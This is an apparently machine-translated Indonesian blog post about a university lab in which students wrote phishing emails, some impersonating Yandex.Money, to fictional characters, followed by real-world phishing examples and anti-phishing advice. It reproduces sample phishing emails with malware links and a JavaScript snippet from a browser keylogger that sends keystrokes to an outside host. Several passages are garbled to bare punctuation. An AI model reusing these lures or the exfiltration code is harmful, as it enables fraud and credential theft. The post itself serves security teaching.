Halo, Habr! Saya adalah editor blog ini, dan saya juga terkadang mengajar virologi di universitas.
Saya memutuskan untuk mendiversifikasi proses pendidikan dan menghasilkan beberapa tugas untuk siswa lima tahun - sedemikian rupa sehingga praktik dan relevansi, daripada menghapus kode dari tahun 2003. Salah satu tugasnya adalah untuk menciptakan dan mengirim surat phishing kepada orang-orang fiksi yang bisa eksis dalam kenyataan. Lagi pula, jika Anda tidak tahu cara menyerang, maka Anda tidak tahu bagaimana mempertahankan diri, bukan?
Saya akan menunjukkan yang terbaik dari apa yang terjadi: surat-surat apa yang dapat dikirim oleh para scammer atas nama Yandex.Money, bagaimana para siswa berpura-pura menjadi layanan, dan untuk hidangan penutup - metode yang digunakan para scammer saat ini (misalnya, beberapa surat yang diterima oleh para pengguna kami yang waspada).
Peringatan
Jangan melakukan phishing. Secara formal, ini adalah penipuan, itu dituntut berdasarkan pasal 159.6 KUHP Federasi Rusia. Pekerjaan laboratorium dilakukan dalam kondisi yang terkendali, surat dikirim ke kotak yang telah disiapkan, akses yang tersedia hanya untuk penulis pos. Siswa diperingatkan akan potensi pertanggungjawaban atas pengiriman surat phising keluar dari lab.
Semua karakter adalah fiktif, semua kebetulan dengan orang dan organisasi nyata adalah acak. Semua logo, merek dagang, dan nama milik masing-masing pemiliknya.
Saya sudah menceritakan kisah serupa sedikit lebih dari setahun yang lalu. Sejak itu, saya menjadi editor habrablog. Di tempat kerja saya banyak berkomunikasi dengan berbagai departemen, termasuk departemen keamanan informasi. Seluruh perusahaan, yang logis tentang uang, mendekati keamanan yang sesuai - dinas keamanan (SB) melindungi segala sesuatu dan semua orang di dalamnya, dan juga mencegah penipu untuk melakukan kejahatan atas nama layanan.
Dan karena saya memutuskan untuk memberikan tugas seperti itu kepada siswa, saya bertanya-tanya apakah mereka dapat dengan jujur mengambil uang fiksi dari karakter fiksi. Motivasi penting di sini - semua ini dilakukan hanya untuk tujuan pendidikan, sehingga spesialis keamanan di masa depan memahami ancaman apa yang ada dan bagaimana melindungi diri dari mereka.
Dramaturgy
Semua orang berbeda - dengan pengalaman yang berbeda, pengetahuan IT dan kepercayaan yang berbeda pada orang - jadi saya datang dengan tiga karakter dan meminta siswa untuk menemukan pendekatan kepada mereka. Pembatasan itu murni teknis - surat itu harus dikirim ke kotak surat yang ditentukan, tidak boleh jatuh ke dalam spam, dan harus ada cara untuk mengumpulkan data pribadi. Yang mana merupakan kebijaksanaan siswa.
Tugas laboratorium penuh ada di bawah spoiler.
Pekerjaan lab . 1. . napechata.li/form , . 2. , . 3. , . , , , . 4. — (, , , ) , . . 5. , , . . (, , ) . 6. , , . 7. , , . : 1. 2. , 3. 4. 5. ,
Valeria Valeryevna Golova, 31, Ust-Kamenogorsk
Pengacara di biro hukum swasta Soft Sign. Mail - odnagolowa@yandex.ru.
Valeria pada dasarnya adalah seorang humanis, tetapi seorang teknisi. Dia lulus dari Sekolah Tinggi Teknologi Informasi Ust-Kamenogorsk dan bekerja sebagai pengacara administrator sistem di sebuah perusahaan swasta yang beranggotakan empat orang.
Valeria suka menyimpan gambar lampu di jejaring sosial, memiliki blog di LiveJournal, tempat ia berbagi mimpinya, dan pada hari Minggu ia pergi ke konser gratis, yang ia temukan di grup "Konser gratis Ust-Kamenogorsk".
Khusanboy Erdashevich Sotvondiev, 19, St. Petersburg
Sopir taksi di armada taksi "Timoshinsky." Mail - husanboy7902301@mail.ru
Husanboy datang ke St. Petersburg dari Urgench, di mana ia bekerja sebagai sopir taksi selama 3 tahun. Sekarang dia terus melakukan hal yang sama di St. Petersburg pada Kia Rio lama, yang dia warisi dari seorang teman. Husanboy dulu merekam trek rap dan menerbitkannya tanpa nama samaran, tapi sekarang dia hanya mengikuti artis baru, jadi dia terdaftar di semua situs tematis populer.
Albert Mikhailovich Alberlive, 54, Khabarovsk
Wiraswasta. Mail - al.ber.live@outlook.com
Albert Mikhailovich telah melihat banyak dalam hidupnya - ia mengirim surat ke Mavrodi, mengisi air dengan Kashpirovsky dan merupakan agen platinum Tiens dengan jaringan 22 orang. Sekarang dia lagi menunggu pensiun dan, agar tidak membuang waktu dengan sia-sia, dia memutuskan untuk berinvestasi dalam bitcoin dan cashbury. Albert Mikhailovich memiliki profil di semua jaringan sosial, dompet elektronik di semua layanan berbahasa Rusia dan kepercayaan yang luar biasa terhadap orang-orang dan teknologi.
Terkirim
Tahun ini, siswa memiliki sedikit waktu - jadi surat-surat pertama tiba dengan cepat. Namun demikian, sebagian besar dari mereka mencerminkan pola phishing nyata yang ditemukan siswa di Internet dan mencoba menerapkannya pada kondisi masalah.
Albert Alberlive
Jujur, karakter ini paling membuat saya penasaran - apa yang akan terjadi, surat apa dan dari layanan mana akan terbang? Piramida keuangan, dompet elektronik, cryptocurrency? Siswa tidak mengecewakan - di Kotak Masuk ada surat pada semua topik ini dari sistem pembayaran paling populer. Saya ingin menunjukkan semuanya secara langsung, tetapi, sayangnya, ini tidak mungkin.
Phishing atas nama Yandex.Money
Pertama-tama, saya tertarik pada surat-surat atas nama Yandex.Money.
Semua siswa yang mengirim surat atas nama layanan mengambil pendekatan yang sama - untuk mengumumkan produk baru yang akan menyelamatkan Anda dari semua masalah dan membantu Anda menghasilkan uang. Seperti yang akan saya tunjukkan nanti, ini tidak cukup sesuai dengan perilaku nyata scammers.
Biarkan saya mengingatkan Anda bahwa semua aplikasi resmi Yandex.Money tinggal di bagian khusus di situs web Yandex , dan pengumuman potongan baru tinggal di layanan pers . Periksa di sana jika Anda tiba-tiba melihat pengumuman yang tidak biasa atau mengejutkan tentang Yandex.Money dalam sumber yang tidak bisa dipahami.
Sekarang mari kita lihat apa yang salah dengan surat-surat ini. Khusus untuk ini, saya menangkap Natasha, pemimpin redaksi Money, di koridor, dan menunjukkan tangkapan layar. Natasha tahu segalanya tentang bagaimana mereka menulis dan tidak menulis dalam Uang, yang saya manfaatkan.
Pertanyaannya sederhana: bagaimana memahami bahwa ini tidak ditulis oleh kami? Saya mengirimkan mikrofon:
Dompet Yandex. Cripto
Tingkat atas: tidak jelas mengapa pengguna bahkan menerima email tentang subjek ini; surat tentang apa cryptocurrency umumnya pandai, tetapi bagaimana mereka bisa berguna bagi saya tidak jelas.
Menurut teks: tanda seru (hampir tidak ada), klerikal di kantor (memastikan keamanan transaksi -) + kelalaian dengan tipografi.
Penyelamatan Yandex
- Nama + surat yang beredar.
- Ketidakpastian: apa artinya "dikompromikan"? Nah, apa yang harus saya lakukan dengan itu?
- Sekali lagi kanselir.
- Apa itu "pemulihan yang dikonfirmasi", saya ingin tahu.
- Tidak ada tombol heading + tombol (kami biasanya mencoba membuat kombinasi ini memberikan gambaran umum tentang esensi).
Dukungan teknis Yandex.Money
Semuanya buruk di sini: dari hal sepele seperti desain ceroboh ke pesan utama (mengapa, jika tidak, akun tidak dapat dipulihkan - itu adalah pemerasan pemerasan).
Secara umum, Natasha menyimpulkan, kami tidak menulis seperti itu. Mari kita beralih ke contoh-contoh penting lainnya.
Surat panas untuk AlbertPenambang inovatif baru
Kemajuan tanpa khawatir.
Anda selalu ingin menyentuh dunia mata uang kripto, tetapi tidak tahu harus mulai dari mana? Gunakan penambang kami saat Anda tidak menggunakan komputer. Bahkan waktu akan bekerja untuk Anda.
Maju.
Semuanya akan dimulai dalam satu iseng http://clc.am/ \
Semuanya baik-baik saja dalam surat ini - hanya tombol normal dengan ajakan bertindak tidak ada. Sebaliknya, ada tautan kecil di bawah ini, yang masih tidak mengklik. Secara umum, kegagalan total potensi cryptogeny di pasar cryptocurrency.
Roti yang dijanjikan - jangan berusaha, semuanya bekerja dengan sendirinya, tanpa investasi. Ya tentu saja.
Platform Perdagangan Investasi Generasi Baru
Apakah ada komentar yang diperlukan di sini?
Photo Bank dari Photo Bank
Bagaimana cara menambahkan surat soliditas? Tentu saja, gunakan foto dari bank foto. Mengejutkan bahwa di bawah dalam surat yang sama tidak ada orang yang tersenyum dalam setelan bisnis.
Valeria Golova
Valeria mengirim banyak surat dari LiveJournal, VK, dari kursus mimpi jernih, situs dengan acara, dan bahkan beberapa pesan dari penggemar blognya.
Surat panas untuk Valeria
Belajar tidak tinggal diam dan berkembang. Valeria ditawari untuk memilih kategori iklan - mengapa tidak memanfaatkan tawaran yang begitu hebat?
"Penyerang" mencoba - tautan dalam surat itu mengarah ke situs di hosting gratis, di mana dalam gaya LiveJournal mereka menggambar formulir untuk memasukkan data pribadi dan informasi kartu.
Sangat mudah untuk tidak mencurigai apa pun - tetapi cukup periksa bilah alamat. Selain itu, ketika saya pertama kali membuka tautan ini dan memasuki peta fiksi, saya melihat pop-up ini:
Mereka memperingatkan Anda agar tidak sia-sia - situs itu benar-benar berbahaya.
"Situs" semacam itu di hosting gratis tidak bertahan lama dan juga diisi dengan tanda air. Dan pada hosting berbayar (dan dengan domain tingkat kedua), Anda dapat mengirim keluhan tentang phishing dan penipuan. Seperti yang diperlihatkan oleh praktik, situs-situs tersebut secara aktif diblokir - misalnya, Dewan Keamanan kami secara teratur mengirimkan aplikasi ke pendaftar ketika mendeteksi skema penipuan baru.
Aplikasi desktop LiveJournal
Orang-orang tidak terlalu malas dan bahkan menulis aplikasi desktop - well, well done. Bahkan melihat publikasi tanpa internet pun kacau.
Tautan mengarah ke file exe: http: //xxx.193.52.92/livejournal_desktop_1.0.3b.exe . Tentu saja, saya tidak akan mengunggahnya.
Sebelum memasang aplikasi apa pun dari sumber yang meragukan (dan surat merupakan sumber yang sangat meragukan), buka situs web resmi dan lihat apakah ada di sana sama sekali. Dan jika ada, instal dari sana.
Ekstensi browser
Saya suka murid-murid saya dan praktis tidak membatasi imajinasi mereka. Ini mengarah pada kenyataan bahwa surat-surat seperti itu datang. Saya membawanya secara keseluruhan - ini sangat indah.
> , . "Your Favourite Song". , -! , , ! . , , , , - -. - , . . > 1. https://goo-gl.ru/OK zip-. 2. zip- . 3. . 4. " ". 5. , keylogExten. 6. . 7. ! > , "Your Favourite Song".
Di sini, pendekatannya adalah yang paling radikal yang dikirim tahun ini. Dengan referensi - penyingkat, yang mengalihkan ke penyimpanan cloud. Di sana terletak keylogger browser, dikemas dalam dua arsip. Di dalamnya ada pendengar peristiwa sederhana yang berjalan di jquery, mendengarkan acara keydown, mengumpulkan kode dalam paket, dan mengirimkannya ke server.
function sendSymOnServer(page, data) { var xhr = new XMLHttpRequest(); var body = 'page = ' + encodeURIComponent(page) + '&data = ' + encodeURIComponent(data); xhr.open("POST", 'https://requestb.in/1fa7izj1', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send(body); }
Secara alami, jangan pernah memasang ekstensi yang tidak perlu - terutama ekstensi dengan kata keylog dalam uraiannya.
Tulis, potong
Seperti tahun lalu, copywriting brilian bukan tanpa. Ketika saya sedang menulis artikel ini, ternyata orang lain adalah copywriter, dan siswa mengambil teks dari Internet.
Pada titik ini, semua spanduk iklan kontekstual menunjukkan kepada saya segala sesuatu tentang mimpi yang jernih. Dan itu menurut Anda juga. Jangan bersyukur.
Surat dari penggemar
Bagiku, jenis phishing paling berbahaya. Seorang penyerang telah memeriksa situasi dan telah mencapai titik sakit - mungkin sulit bagi semua orang untuk mengatasi pujian, pujian, pengakuan dan tidak mulai menanggapi scammer.
Berikut ini sebuah contoh:
Selamat malam, Valeria.
Saya minta maaf atas keprihatinan ini, Nama saya Dmitry, dan pertama-tama saya ingin mengucapkan terima kasih atas posting hangat Anda di majalah.
Mungkin, saya akan tetap menjadi pembaca yang diam, terinspirasi oleh teladan Anda, tetapi mimpi kemarin Anda masih tidak meninggalkan pikiran saya.
Dia mengingatkan saya pada karya seniman visioner berbakat bernama Freudun Rassuli, dan sebagian besar - lukisannya "Perjalanan Rumah".
Seperti halnya Anda, tema persatuan kosmik dekat dengan seniman ini: ia yakin bahwa setiap ciptaan adalah produk dari sinkronisasi energi kita dengan Semesta.
Saya pikir akan menarik bagi Anda untuk berkenalan dengan karyanya secara lebih rinci, jadi saya memilih karya-karyanya yang paling canggih dan terdalam.
Sayangnya, saya tidak bisa melampirkan semuanya sekaligus, tetapi saya bisa menawarkan arsip dengan pilihan saya sendiri.
https://cloud.mail.ru/public/Bg6E/WKr64w
Saya yakin Anda dapat menemukan banyak kesamaan di antara lukisan-lukisan menakjubkan ini dengan impian Anda. Dan saya pikir mereka akan terlihat bagus di blog Anda.
Hormat kami
Pembaca reguler Anda.
Tautan berisi file Figur.exe, di mana, tentu saja, tidak ada gambar, tetapi ada keylogger.
Dan penggemar lainnya:
> , . > , . > . . , - ? . . . ""? . > , > .
Di bawah tautan adalah bentuk otorisasi lain di LiveJournal pada hosting gratis (to the point - livejjournal). Ada https, jadi browser tidak bersumpah, tetapi Anda masih harus hati-hati menonton.
Antiphishing
Ngomong-ngomong, setelah beberapa huruf pertama Yandex mengirim surat tentang bagaimana membedakan surat yang baik dari surat scammers. Vigil.
Husanboy Sotvondiev
Siswa memahami dengan baik semangat komik dari tugas dan mengirim hal-hal yang menyebabkan saya berbagai emosi dari tawa gugup ke kebingungan. Secara umum, menurut saya mereka melakukan pekerjaan dengan baik. Karakter menerima surat dari situs rap, denda dari portal layanan publik, surat dari perusahaan taksi (di antara mereka hanya ada satu dengan nama "Timoshinsky") dan, menurut tradisi, beberapa surat pribadi.
Surat panas untuk HusanboyKontes artis rap tidak dikenal
Pertama-tama, saya beralih ke artis rap yang tidak dikenal yang datang ke halaman ini untuk berpartisipasi dalam kompetisi.
Hai teman-teman, jangan pernah bereaksi terhadap surat-surat seperti itu, itu tidak masuk akal.
> ! > . - . , . 6 . . . , / , / , , .
Jika Anda dapat membaca teks ini tanpa pernah melirik, beri tahu kami apa yang ada di sana. Tautan setelah surat itu mengarah ke bentuk Google dari 30 bidang (Trojan elephant!), Yang paling menonjol di antaranya adalah:
- Kata sandi masuk
- Program yang digunakan saat membuat (merekam) trek *.
- E-mail / tautan di jejaring sosial karyawan yang mungkin tertarik dengan arah hip-hop *.
- Nama lengkap karyawan yang mungkin tertarik dengan hip-hop *.
Jangan pernah masuk di situs asing nama lengkap karyawan yang mungkin tertarik dengan arah hip-hop.
Sotvondiev Antivirus
Selamat siang
Sehubungan dengan pengetatan kebijakan untuk memproses data pribadi dalam armada taksi kami, semua karyawan perlu menggunakan alat keamanan bersertifikat.
Sebagai alat seperti itu, Kaspersky Endpioint Security dipilih di perusahaan kami, yang memiliki sertifikat kesesuaian FSB SF / 019-3471 dan FSTEC No. 3025.
Anda dapat mengunduh file instalasi alat ini di tautan berikut:
http://aes.s.kaspersky-labs.com/endpoints/keswin11/11.0.1.90/russian-2778/bb0e36ac/keswin_11.0.1.90_en_aes256.exe
Permintaan karyawan untuk mengunduh dan menginstal Kaspersky Endpoint Security sendiri. Pada akhir bulan, selama inspeksi yang dijadwalkan, dana akan diaktifkan oleh spesialis departemen kami.
Departemen keselamatan teknis armada taksi "Timoshinsky".
Adalah baik bahwa scammers malu menggunakan pemeriksa ejaan. Ini membantu mengidentifikasi bid'ah di kotak masuk dan menghapusnya tanpa membacanya. Tentu saja, tautan tersebut mengarah ke tempat yang salah - meskipun juga dapat dieksekusi.
Artis rap yang tidak dikenal dan di mana mereka tinggal
Sebaliknya, klik pada tautan, lihat, dan di sana ...
Tim siswa ini memutuskan untuk mengidentifikasi cara menangkap seseorang di phishing. Ini bukan tanpa makna - pemahaman tentang mekanisme proses itu penting di sini, jadi saya menghitung lab dengannya, meskipun bukan tanpa ragu-ragu.
Saya ulangi sekali lagi - jangan masukkan data apa pun pada kartu bank di situs yang tidak diverifikasi.
Memotret dalam klip rapper
Aku pergi, bertekad untuk membintangi video, dan di sana:
> Kesalahan: Akun ini telah ditangguhkan.
Detail tentang pemilik akun:
Nama: Phishing Terdeteksi
Nama pengguna:
Email: rap.ruXXXX@gmail.com
Seperti yang Anda lihat, layanan melawan phishing bahkan sebelum saya membicarakannya di Habré. Karena itu, saya belajar tentang apa yang ada di situs hanya dari laporan. Lain kali saya akan berbicara tentang bagaimana saya menerima laporan - ini adalah cerita besar yang terpisah.
Tes drive histeris
Kia Center St. Petersburg melaporkan bahwa Anda memiliki kesempatan unik untuk menyewa mobil Kia Quoris yang benar-benar baru. Ini adalah model kelas bisnis yang benar-benar baru, dengan mesin yang sepenuhnya baru dan suspensi serta sistem transmisi yang didesain ulang. Dan yang paling penting, Anda mendapatkan kesempatan yang belum pernah terjadi sebelumnya untuk mendapatkan mobil ini selama SATU BULAN !!! Untuk penggunaan pribadi !!! Mengendarainya di kota, coba perjalanan jauh, evaluasi kualitas dan keandalan mobil baru kami!
Bahkan dalam surat itu ada gambar yang indah dengan mobil ini dan tautan ke formulir online untuk menerima informasi yang berbeda.
Siswa juga menggunakan informasi bahwa karakter itu mengendarai mobil teman, dan memicu minat calon korban dengan fakta bahwa hanya ada 3 mobil yang tersisa. Secara umum, ini saatnya untuk berlari, bergegas dan mendaftar untuk test drive gratis.
Dan lebih baik untuk mengingat bahwa tidak ada yang gratis di Internet, dan jangan tertipu oleh surat yang meragukan.
Seperti apa phishing di alam liar
Semua contoh di atas adalah fantasi siswa saya, dan mereka hanya berhubungan dengan kenyataan bahwa mereka semua dapat ditulis dan dikirim. Sangat mudah untuk melindungi diri Anda sendiri - cukup periksa tautannya dengan hati-hati, jangan mengunduh file asing dari lampiran dan perhatikan kesalahan ketik pada teks. Dan jika Anda tidak memasukkan data pribadi apa pun di situs-situs yang tidak jelas, maka Anda dapat menjalani seluruh hidup Anda dan tidak mengetahui bagaimana keadaannya ketika Anda mencuri uang atau mengambil pinjaman mikro untuk memindai paspor Anda.
Saya meminta kolega dari Dewan Keamanan untuk menunjukkan email phishing nyata yang hidup di alam liar sekarang. Ini hanya beberapa contoh yang menunjukkan bahwa scammers dapat mengambil trik yang sangat berbeda untuk mendapatkan uang Anda. Bahkan, ada banyak lagi, jadi Anda harus siap untuk semuanya.
Dompet Anda diisi ulang
Pengguna menerima pesan bahwa dompetnya diisi kembali. Dalam komentar tentang pembayaran, ada eyeliner iklan dan tautan ke situs di mana Anda bisa mendapatkan seribu dolar sehari tanpa melakukan apa pun untuk ini.
Ternyata scammers tidak hanya bisa memalsukan surat seperti itu. Faktanya adalah bahwa surat palsu dengan probabilitas tinggi tidak akan melalui filter spam dalam surat. Tetapi surat otomatis dari layanan, dibentuk setelah pembayaran mikro nyata ke akun, dapat mencapai.
Tautan dari komentar biasanya mengarah ke situs di mana orang berusaha mengambil uang secara relatif dari populasi.
Alamat IP Anda telah terdaftar
Surat yang diduga dari dukungan teknis Yandex.Money. Anda sudah tahu bagaimana membedakannya dari sekarang - terima kasih kepada Natasha.
Apa lagi yang terjadi?
Phishing, tentu saja, tidak hanya tentang surat.
Salah satu contoh sesuatu selain yang dikirim pembaca blog kepada kami. Bayangkan - ini adalah iklan Instagram palsu yang mengarah ke publik yang curang di VK, yang mengarah ke situs pendaratan palsu dengan jajak pendapat palsu yang menurut dugaan mereka membayar uang penipuan.
Tentu saja, mereka tidak benar-benar membayar.
Ini adalah iklan palsu.
Rantai ini bahkan memiliki kondisi "kirim tautan ke 20 teman di WhatsApp untuk melanjutkan." , .
- , « ?» ( , ) :
« 80000 , — . 150 ».
, , .
?
:
- , .
- , — , , .
- — , , — . , .
- , - , .
- .
- . , .
- , . , - .
- . .
, , , . , . .